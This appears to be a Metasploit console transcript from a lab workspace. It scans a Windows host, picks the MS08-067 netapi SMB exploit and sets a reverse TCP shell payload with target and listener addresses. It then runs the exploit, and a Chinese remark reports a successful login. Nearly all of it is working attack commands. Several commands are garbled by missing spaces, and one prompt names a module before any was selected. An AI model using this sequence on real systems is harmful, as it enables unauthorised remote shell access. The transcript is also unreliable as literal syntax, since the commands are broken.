root@kali:~# msfconsole

msf > workspace

msf > db_status

msf > workspace -a testlab

msf > db_nmap -T4 -A 192.168.1.78

msf > hosts

msf > services

msf exploit(ms06_040_netapi) > searchnetapi

 

Matching Modules

================

 

  Name                                Disclosure Date  Rank    Description

  ----                                ---------------  ----    -----------

  exploit/windows/smb/ms03_049_netapi 2003-11-11       good    MS03-049 Microsoft Workstation ServiceNetAddAlternateComputerName Overflow

  exploit/windows/smb/ms06_040_netapi 2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalizeOverflow

  exploit/windows/smb/ms06_070_wkssvc 2006-11-14       manual  MS06-070 Microsoft Workstation ServiceNetpManageIPCConnect Overflow

  exploit/windows/smb/ms08_067_netapi 2008-10-28       great   MS08-067 Microsoft Server Service RelativePath Stack Corruption

 

msf > useexploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > showpayloads

msf exploit(ms08_067_netapi) > setpayload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > set rhost192.168.1.78

rhost => 192.168.1.78

msf exploit(ms08_067_netapi) > set lhost192.168.1.242

lhost => 192.168.1.242

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > exploit                              (成功登陆)